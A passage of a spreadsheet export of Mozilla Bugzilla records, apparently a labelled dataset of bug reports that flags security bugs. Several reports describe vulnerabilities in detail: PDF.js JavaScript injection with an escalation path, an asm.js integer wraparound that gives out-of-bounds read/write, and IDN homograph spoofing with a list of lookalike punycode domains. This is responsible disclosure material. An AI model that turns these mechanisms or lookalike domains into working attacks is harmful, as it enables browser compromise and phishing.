      <c r="S1894" t="inlineStr">
        <is>
          <t>Firefox 61</t>
        </is>
      </c>
      <c r="T1894" t="n">
        <v>1</v>
      </c>
      <c r="U1894" t="n">
        <v>0</v>
      </c>
      <c r="V1894" t="n">
        <v>22</v>
      </c>
      <c r="W1894" t="inlineStr">
        <is>
          <t>Created attachment 8965652
Proof of concept PDF
PDF Viewer will convert PostScript calculator functions to JavaScript. While the PostScript code itself is being validated thoroughly, for the Domain and Range parameters in the PDF file the code will only verify that these are arrays (see https://hg.mozilla.org/mozilla-central/file/2f5ffe4fa2153a798ed8b310a597ea92abd1b868/browser/extensions/pdfjs/content/build/pdf.worker.js#l20413). PostScriptCompiler will then insert the array entries into the generated JavaScript code verbatim assuming that these are numbers (as they should be per spec), a malicious PDF file can use strings to inject JavaScript code this way.
Steps to reproduce:
1. Press Ctrl+Shift+J to open Browser Console.
2. Switch back to the browser and open the attached PDF file.
3. Check the Browser Console.
In Firefox 59.0.2 and 61.0a1 (2018-04-06) nightly the following message shows up in Browser Console: "Hello, this is code running in resource://pdf.js/build/pdf.worker.js." You can look at the text of the PDF file to see that the code being executed here is console.log("Hello, this is code running in " + location.href).
I did not implement additional exploit steps but code running in the worker can jump over to the viewer itself. For that it would send a malicious glyph to the viewer, you can see under https://hg.mozilla.org/mozilla-central/file/2f5ffe4fa2153a798ed8b310a597ea92abd1b868/browser/extensions/pdfjs/content/build/pdf.js#l6354 that glyph data is being used to produce JavaScript code without further validation - this code assumes that validation happens in the worker.
Once in the viewer, the code could trigger the ChromeActions API available to the viewer (see https://hg.mozilla.org/mozilla-central/file/2f5ffe4fa2153a798ed8b310a597ea92abd1b868/browser/extensions/pdfjs/content/PdfStreamConverter.jsm#l191) and read/write preferences in the pdfjs.* namespace for example. Also, it could add iframe tags pointing to other PDF files (e.g. from intranet domains). Since PDF Viewer would load into these domains as well, it could access their contents (same-origin) and steal PDF data.</t>
        </is>
      </c>
      <c r="X1894" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1895">
      <c r="A1895" t="n">
        <v>203084</v>
      </c>
      <c r="B1895" t="inlineStr">
        <is>
          <t>2003-04-23 12:24:14 -0700</t>
        </is>
      </c>
      <c r="C1895" t="inlineStr">
        <is>
          <t>Host properties getting lost on "simple" host classes</t>
        </is>
      </c>
      <c r="D1895" t="inlineStr">
        <is>
          <t>2011-08-05 21:26:49 -0700</t>
        </is>
      </c>
      <c r="E1895" t="n">
        <v>1</v>
      </c>
      <c r="F1895" t="n">
        <v>1</v>
      </c>
      <c r="G1895" t="n">
        <v>3</v>
      </c>
      <c r="H1895" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1895" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1895" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1895" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1895" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1895" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N1895" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1895" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1895" t="inlineStr"/>
      <c r="Q1895" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1895" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1895" t="inlineStr">
        <is>
          <t>mozilla1.4beta</t>
        </is>
      </c>
      <c r="T1895" t="n">
        <v>1</v>
      </c>
      <c r="U1895" t="n">
        <v>0</v>
      </c>
      <c r="V1895" t="n">
        <v>17</v>
      </c>
      <c r="W1895" t="inlineStr">
        <is>
          <t>Something has changed recently in the tip of the Spidermonkey source, and now
class-specific properties are getting somehow "lost".
When I make a JSClass that has only one property, with a property-specific
getter and setter pair, the property itself gets overridden the first time it's set.
In other words: a generic class:
static JSClass BusyIcon_Class =
{ "BusyIcon", 0,
  JS_PropertyStub,  JS_PropertyStub, JS_PropertyStub, JS_PropertyStub,
  JS_EnumerateStub, JS_ResolveStub,  JS_ConvertStub,  JS_FinalizeStub,
  JSCLASS_NO_OPTIONAL_MEMBERS
};
And one simple property:
static JSPropertySpec BusyIcon_Properties[] =
{
    { "x", ID_BusyIcon_x, JSPROP_ENUMERATE, BusyIcon_GetXPos, BusyIcon_SetXPos },
    { 0 }
};
When something gets this 'x' property, everything works fine.  But when someone
sets the 'x' property, things are turned off.  After instrumenting the add and
get callbacks, it looks like a new property is being created ('x') and stored in
the object, NOT using the tinyid. This new property is then just a standard JS
prop and doesn't cause the getter/setter callbacks to be used anymore.
I'll attach a diff to js.c at the end of this message that allows the test to be
compiled.
A simple script log looks like (my getters and setters are instrumented):
js&gt; busyIcon
JS: Adding new BusyIcon object to 002F8B40 (as "busyIcon").
[object BusyIcon]
js&gt; busyIcon.x
JS: BusyIcon_GetXPos --&gt; 0
0
js&gt; busyIcon.x = 3;
3
js&gt; busyIcon.x
3
js&gt;
Notice that the getter is called the first time, but not the second time.  The
setter is never called.
There is a workaround:  Setting JSPROP_SHARED on the properties makes everything
work just fine.  And it's arguably the right thing to do even if this bug is
fixed.  Still.  What's going on here shouldn't happen, I think.
--Steve Cole</t>
        </is>
      </c>
      <c r="X1895" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1896">
      <c r="A1896" t="n">
        <v>1152280</v>
      </c>
      <c r="B1896" t="inlineStr">
        <is>
          <t>2015-04-08 04:50:56 -0700</t>
        </is>
      </c>
      <c r="C1896" t="inlineStr">
        <is>
          <t>Incorrect asm.js bounds check elimination vulnerability (Firefox 37.0.1)</t>
        </is>
      </c>
      <c r="D1896" t="inlineStr">
        <is>
          <t>2024-05-30 09:00:10 -0700</t>
        </is>
      </c>
      <c r="E1896" t="n">
        <v>1</v>
      </c>
      <c r="F1896" t="n">
        <v>1</v>
      </c>
      <c r="G1896" t="n">
        <v>3</v>
      </c>
      <c r="H1896" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1896" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1896" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1896" t="inlineStr">
        <is>
          <t>37 Branch</t>
        </is>
      </c>
      <c r="L1896" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1896" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N1896" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1896" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1896" t="inlineStr">
        <is>
          <t>[adv-main38+]</t>
        </is>
      </c>
      <c r="Q1896" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1896" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1896" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T1896" t="n">
        <v>1</v>
      </c>
      <c r="U1896" t="n">
        <v>0</v>
      </c>
      <c r="V1896" t="n">
        <v>14</v>
      </c>
      <c r="W1896" t="inlineStr">
        <is>
          <t>Created attachment 8589587
poc.html
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Steps to reproduce:
An out-of-bounds read/write vulnerability exists in Firefox 37.0.1 (32-bit), which is similar to (but distinct from) a recent Pwn2Own vulnerability. This was tested on Windows.
To trigger the vulnerability, an asm.js change-heap function must be defined with a minLengthExclusive of 0xFFFFFFFF. This function is parsed by CheckHeapLengthCondition in AsmJSValidate.cpp, which validates this value, then adds one to it, wrapping the value to zero. This zero is then stored as the module's minHeapLength, allowing heaps of any (otherwise valid) size to be used.
In FoldMaskedArrayIndex, one is subtracted from the minHeapLength, wrapping back to 0xFFFFFFFF, which is assumed to be less than the heap size for bounds checking purposes. This function will then omit bounds checks for masks as large as 0x7FFFFFFF, even though much smaller heaps can be used. This allows asm.js code to read and write past the end of its heap.
To reproduce, see the attached proof of concept.
Actual results:
Arbitrary read/write.
Expected results:
Probably an error or something.</t>
        </is>
      </c>
      <c r="X1896" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1897">
      <c r="A1897" t="n">
        <v>496841</v>
      </c>
      <c r="B1897" t="inlineStr">
        <is>
          <t>2009-06-07 17:53:42 -0700</t>
        </is>
      </c>
      <c r="C1897" t="inlineStr">
        <is>
          <t>Add upload-log target to signing Makefile</t>
        </is>
      </c>
      <c r="D1897" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1897" t="n">
        <v>1</v>
      </c>
      <c r="F1897" t="n">
        <v>1</v>
      </c>
      <c r="G1897" t="n">
        <v>5</v>
      </c>
      <c r="H1897" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1897" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1897" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1897" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1897" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1897" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1897" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1897" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1897" t="inlineStr"/>
      <c r="Q1897" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1897" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1897" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1897" t="n">
        <v>1</v>
      </c>
      <c r="U1897" t="n">
        <v>0</v>
      </c>
      <c r="V1897" t="n">
        <v>4</v>
      </c>
      <c r="W1897" t="inlineStr">
        <is>
          <t>We have a target for the actual builds, just need a one-liner to upload the log too.</t>
        </is>
      </c>
      <c r="X1897" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1898">
      <c r="A1898" t="n">
        <v>1364283</v>
      </c>
      <c r="B1898" t="inlineStr">
        <is>
          <t>2017-05-11 19:18:50 -0700</t>
        </is>
      </c>
      <c r="C1898" t="inlineStr">
        <is>
          <t>Security: disallow "Canadian Syllabics" unicode block from IDN domains</t>
        </is>
      </c>
      <c r="D1898" t="inlineStr">
        <is>
          <t>2024-05-30 09:33:09 -0700</t>
        </is>
      </c>
      <c r="E1898" t="n">
        <v>1</v>
      </c>
      <c r="F1898" t="n">
        <v>1</v>
      </c>
      <c r="G1898" t="n">
        <v>3</v>
      </c>
      <c r="H1898" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1898" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1898" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K1898" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L1898" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1898" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1898" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1898" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1898" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q1898" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1898" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1898" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T1898" t="n">
        <v>1</v>
      </c>
      <c r="U1898" t="n">
        <v>0</v>
      </c>
      <c r="V1898" t="n">
        <v>30</v>
      </c>
      <c r="W1898" t="inlineStr">
        <is>
          <t>Created attachment 8867025
1-domain_list_sorted_by_alexa.txt
User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36
Steps to reproduce:
VULNERABILITY DETAILS
Firefox should prevent the “Canadian Syllabics” unicode block from rendering in domain names with characters from other unicode blocks. This was observed in data found in the Certificate Transparency log while seeking to quantify the IDN impersonation/phishing problem (raw data attached).
REPRODUCTION CASE
There are a series of characters in the  “CANADIAN SYLLABICS” unicode block which can be used to impersonate other domains. I believe mixing this block with other unicode blocks should be disallowed and the punycode value should be displayed. The characters within this set that I believe could be abused:
http://www.fileformat.info/info/unicode/block/unified_canadian_aboriginal_syllabics/list.htm
(I do not know the registration status of any of the domains below)
http://xn--youtue-084a.com/ -- youtuᖯe.com -- example domain 
http://xn--youtbe-z72a.com/ -- youtᑌbe.com -- example domain
http://xn--uny-8wq.com/ -- ᑭuny.com -- example domain
http://xn--oor-hxq.com -- ᑯoor.com -- example domain
http://xn--ego-73q.com/ -- ᒪego.com -- example domain
http://xn--fc-lym.com/ -- fcᒿ.com -- example domain is not fc2.com (alexa top 1m #97) -- this is likely the hardest to see (based on the fonts I’m using)
http://xn--ulu-7sr.com/ -- ᕼulu.com -- example domain
http://invalid.xn--acebook-yp9a.com/ -- ᖴacebook.com -- example domain
Tested with Firefox Nightly 55.0a1 (2017-05-11) (32-bit)
This issue has also been reported to chromium
Actual results:
unicode domains are displayed when mixing the “CANADIAN SYLLABICS” unicode block with other unicode characters.
Expected results:
Punycode values should have been displayed when mixing the “CANADIAN SYLLABICS” unicode block with other unicode characters.
  ---- background ----
(please excuse the length of this report)
To form the attached lists, I cross referenced the Google CT Pilot log and the Alexa top 1 million domains (only .com domains). 
There are a fair number of false positives (non-abusive domain impersonations or python unidecode failures), but I choose not to manually remove them.
  ---- Other unicode characters observed ----
ĸ, 22, 0x138, "LATIN SMALL LETTER KRA"
96074858, 1509667199, xn--faceboo-jhb.com, facebooĸ.com , ĸ, facebook.com, 3, 1
86142753, 1507679999, xn--autodes-jhb.com, autodesĸ.com , ĸ, autodesk.com, 697, 1
ł, 5, 0x142, "LATIN SMALL LETTER L WITH STROKE"
94011919, 1524055021, xn--ppe-8ka60c.com, àppłe.com , àł, apple.com, 69, 1
94724468, 1500291180, xn--sack-01a.com, słack.com , ł, slack.com, 205, 1
ı, 100, 0x131, "LATIN SMALL LETTER DOTLESS I"
18331655, 1488327078, xn--reddt-q4a.com, reddıt.com , ı, reddit.com, 7, 1
95900673, 1500493680, xn--t-fka.com, tı.com , ı, ti.com, 3235, 1
84518766, 1497998760, xn--gml-kua34j.com, gmȧıl.com , ȧı, gmail.com, 22463, 1
95900424, 1500493860, xn--fat-jua.com, fıat.com , ı, fiat.com, 54102, 1
94504694, 1509148799, xn--curacao-egamng-hgc.com, curacao-egamıng.com , ı, curacao-egaming.com, 524456, 1
94724500, 1500493920, xn--suzu-kza.com, ısuzu.com , ı, isuzu.com, 866480, 1
ì, 25, 0xec, "LATIN SMALL LETTER I WITH GRAVE"
95900680, 1500670920, xn--twttr-7raz.com, twìttèr.com , ìè, twitter.com, 11, 1
85019386, 1507161599, xn--polonex-3ya.com, polonìex.com , ì, poloniex.com, 1595, 1
83724035, 1497798600, xn--gma-pma40b.com, gmaìĺ.com , ìĺ, gmail.com, 22463, 1
 ---- Special case observed ---
2 interesting domains observed bypasses Chromium checks by using only cyrillic characters:
07022746, 1443571199, xn--80aac5cct.com, таобао.com , таобао, taobao.com, 10, 1
10303999, 1461542399, xn--e1anr4f.com, тіме.com , тіме, time.com, 817, 1</t>
        </is>
      </c>
      <c r="X1898" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1899">
      <c r="A1899" t="n">
        <v>568377</v>
      </c>
      <c r="B1899" t="inlineStr">
        <is>
          <t>2010-05-26 17:01:23 -0700</t>
        </is>
      </c>
      <c r="C1899" t="inlineStr">
        <is>
          <t>Need YASM installed on Mac x86 and x86_64 boxes</t>
        </is>
      </c>
      <c r="D1899" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1899" t="n">
        <v>1</v>
      </c>
      <c r="F1899" t="n">
        <v>1</v>
      </c>
      <c r="G1899" t="n">
        <v>5</v>
      </c>
      <c r="H1899" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1899" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1899" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1899" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1899" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1899" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1899" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1899" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1899" t="inlineStr"/>
      <c r="Q1899" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1899" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1899" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1899" t="n">
        <v>1</v>
      </c>
      <c r="U1899" t="n">
        <v>0</v>
      </c>
      <c r="V1899" t="n">
        <v>14</v>
      </c>
      <c r="W1899" t="inlineStr">
        <is>
          <t>We need YASM installed on the x86_64 MacOS Mozilla build machines so that we can build VP8's optimized assembly on that platform. Can we have YASM installed on the build machines please? The same version of YASM which was installed on the Linux build machines (1.0.1.2326) works on Mac x86_64. Thanks!</t>
        </is>
      </c>
      <c r="X1899" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1900">
      <c r="A1900" t="n">
        <v>790139</v>
      </c>
      <c r="B1900" t="inlineStr">
        <is>
          <t>2012-09-10 21:56:02 -0700</t>
        </is>
      </c>
      <c r="C1900" t="inlineStr">
        <is>
          <t>crash in FT2FontEntry::CreateFontEntry when visiting any site in CM10</t>
        </is>
      </c>
      <c r="D1900" t="inlineStr">
        <is>
          <t>2013-01-10 12:35:50 -0800</t>
        </is>
      </c>
      <c r="E1900" t="n">
        <v>1</v>
      </c>
      <c r="F1900" t="n">
        <v>1</v>
      </c>
      <c r="G1900" t="n">
        <v>3</v>
      </c>
      <c r="H1900" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1900" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1900" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K1900" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1900" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M1900" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N1900" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1900" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1900" t="inlineStr">
        <is>
          <t>[native-crash][startupcrash]</t>
        </is>
      </c>
      <c r="Q1900" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1900" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1900" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1900" t="n">
        <v>1</v>
      </c>
      <c r="U1900" t="n">
        <v>2</v>
      </c>
      <c r="V1900" t="n">
        <v>97</v>
      </c>
      <c r="W1900" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-07fb607e-9105-4fad-9ecc-1534e2120911 .
============================================================= 
According to community member Peter Vagner, this happens on http://nightly.mozilla.org, or often when he turns on Reader Mode. An installation of AdBlock doesn't seem to have any bearing. Have been unsuccessful in reproducing so far, but will keep trying.</t>
        </is>
      </c>
      <c r="X1900" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1901">
      <c r="A1901" t="n">
        <v>1284395</v>
      </c>
      <c r="B1901" t="inlineStr">
        <is>
          <t>2016-07-04 22:50:47 -0700</t>
        </is>
      </c>
      <c r="C1901" t="inlineStr">
        <is>
          <t>Show about:blank (placeholder "Search or enter address" in the URL bar) (spoof)</t>
        </is>
      </c>
      <c r="D1901" t="inlineStr">
        <is>
          <t>2017-05-26 03:35:02 -0700</t>
        </is>
      </c>
      <c r="E1901" t="n">
        <v>1</v>
      </c>
      <c r="F1901" t="n">
        <v>1</v>
      </c>
      <c r="G1901" t="n">
        <v>2</v>
      </c>
      <c r="H1901" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1901" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1901" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1901" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L1901" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1901" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1901" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1901" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1901" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main52+]</t>
        </is>
      </c>
      <c r="Q1901" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1901" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1901" t="inlineStr">
        <is>
          <t>Firefox 52</t>
        </is>
      </c>
      <c r="T1901" t="n">
        <v>1</v>
      </c>
      <c r="U1901" t="n">
        <v>0</v>
      </c>
      <c r="V1901" t="n">
        <v>54</v>
      </c>
      <c r="W1901" t="inlineStr">
        <is>
          <t>Created attachment 8767847
PoC.html
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Steps to reproduce:
Open PoC.html and follow instructions
Actual results:
Ended up with completely empty address bar
Expected results:
Main problem I think is the ability to be able to navigate to 'about:home'
So my initial expectation is that about: pages which are
a) Openable by content
b) Have an empty address bar by default
Should not be openable by content.
(So far im only aware of about:home that does this, 'about:newtab' does not meet requirement [a])
Note:
As far as I can tell, this is not a dupe of Bug 1247968 (not fixed) or Bug 1228754 (fixed) but its worth making sure it isn't</t>
        </is>
      </c>
      <c r="X1901" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1902">
      <c r="A1902" t="n">
        <v>126801</v>
      </c>
      <c r="B1902" t="inlineStr">
        <is>
          <t>2002-02-20 14:27:09 -0800</t>
        </is>
      </c>
      <c r="C1902" t="inlineStr">
        <is>
          <t>queryhelp.cgi ignores group-permissions - showing ALL products</t>
        </is>
      </c>
      <c r="D1902" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:28 -0800</t>
        </is>
      </c>
      <c r="E1902" t="n">
        <v>1</v>
      </c>
      <c r="F1902" t="n">
        <v>1</v>
      </c>
      <c r="G1902" t="n">
        <v>4</v>
      </c>
      <c r="H1902" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1902" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1902" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K1902" t="inlineStr">
        <is>
          <t>2.14.1</t>
        </is>
      </c>
      <c r="L1902" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1902" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1902" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1902" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1902" t="inlineStr">
        <is>
          <t>applied to 2.14.2</t>
        </is>
      </c>
      <c r="Q1902" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1902" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1902" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T1902" t="n">
        <v>1</v>
      </c>
      <c r="U1902" t="n">
        <v>0</v>
      </c>
      <c r="V1902" t="n">
        <v>45</v>
      </c>
      <c r="W1902" t="inlineStr">
        <is>
          <t>Hi,
if you login to bugzilla as an user without having permissions (
usebuggroups:on, usebuggroupsentry: on) to show specific products,
all the products AND components are listed on the help-site
http://localhost/bugzilla/queryhelp.cgi 
This is shown also WITHOUT login to the system !!! It is
a security bug !
regards
Danny</t>
        </is>
      </c>
      <c r="X1902" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1903">
      <c r="A1903" t="n">
        <v>1181500</v>
      </c>
      <c r="B1903" t="inlineStr">
        <is>
          <t>2015-07-08 02:56:53 -0700</t>
        </is>
      </c>
      <c r="C1903" t="inlineStr">
        <is>
          <t>Instrumentation for tablet mode usage</t>
        </is>
      </c>
      <c r="D1903" t="inlineStr">
        <is>
          <t>2015-10-19 10:57:24 -0700</t>
        </is>
      </c>
      <c r="E1903" t="n">
        <v>1</v>
      </c>
      <c r="F1903" t="n">
        <v>1</v>
      </c>
      <c r="G1903" t="n">
        <v>2</v>
      </c>
      <c r="H1903" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1903" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1903" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1903" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1903" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1903" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N1903" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1903" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1903" t="inlineStr"/>
      <c r="Q1903" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1903" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1903" t="inlineStr">
        <is>
          <t>Firefox 43</t>
        </is>
      </c>
      <c r="T1903" t="n">
        <v>1</v>
      </c>
      <c r="U1903" t="n">
        <v>0</v>
      </c>
      <c r="V1903" t="n">
        <v>25</v>
      </c>
      <c r="W1903" t="inlineStr">
        <is>
          <t>We have a bunch of tablet mode related issues in Firefox.
In order to have some sense of priority and severity of those bugs (as well as for prioritizing tablet mode specific new enhancements), we need some knowledge on how tablet mode is being used.
Here's the kinds of questions I think we need to get answered. Bryan, Dolske, feel free to edit.
- What % of sessions were fully or partially in tablet mode?
- How long are sessions in tablet mode (vs. normal session length)
- How often does the same user use tablet mode with Firefox? Another way of asking that is: do users continue using Firefox and tablet mode together after discovering it?
Since I assume that telemetry data would be too biased to be of any use here, this would probably need to be done in FHR.</t>
        </is>
      </c>
      <c r="X1903" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1904">
      <c r="A1904" t="n">
        <v>411353</v>
      </c>
      <c r="B1904" t="inlineStr">
        <is>
          <t>2008-01-08 15:01:24 -0800</t>
        </is>
      </c>
      <c r="C1904" t="inlineStr">
        <is>
          <t>Default bookmarks and Smart folder missing from New Profile</t>
        </is>
      </c>
      <c r="D1904" t="inlineStr">
        <is>
          <t>2010-02-24 06:28:09 -0800</t>
        </is>
      </c>
      <c r="E1904" t="n">
        <v>1</v>
      </c>
      <c r="F1904" t="n">
        <v>1</v>
      </c>
      <c r="G1904" t="n">
        <v>2</v>
      </c>
      <c r="H1904" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1904" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1904" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K1904" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1904" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1904" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1904" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1904" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1904" t="inlineStr"/>
      <c r="Q1904" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1904" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1904" t="inlineStr">
        <is>
          <t>Firefox 3 beta3</t>
        </is>
      </c>
      <c r="T1904" t="n">
        <v>1</v>
      </c>
      <c r="U1904" t="n">
        <v>0</v>
      </c>
      <c r="V1904" t="n">
        <v>17</v>
      </c>
      <c r="W1904" t="inlineStr">
        <is>
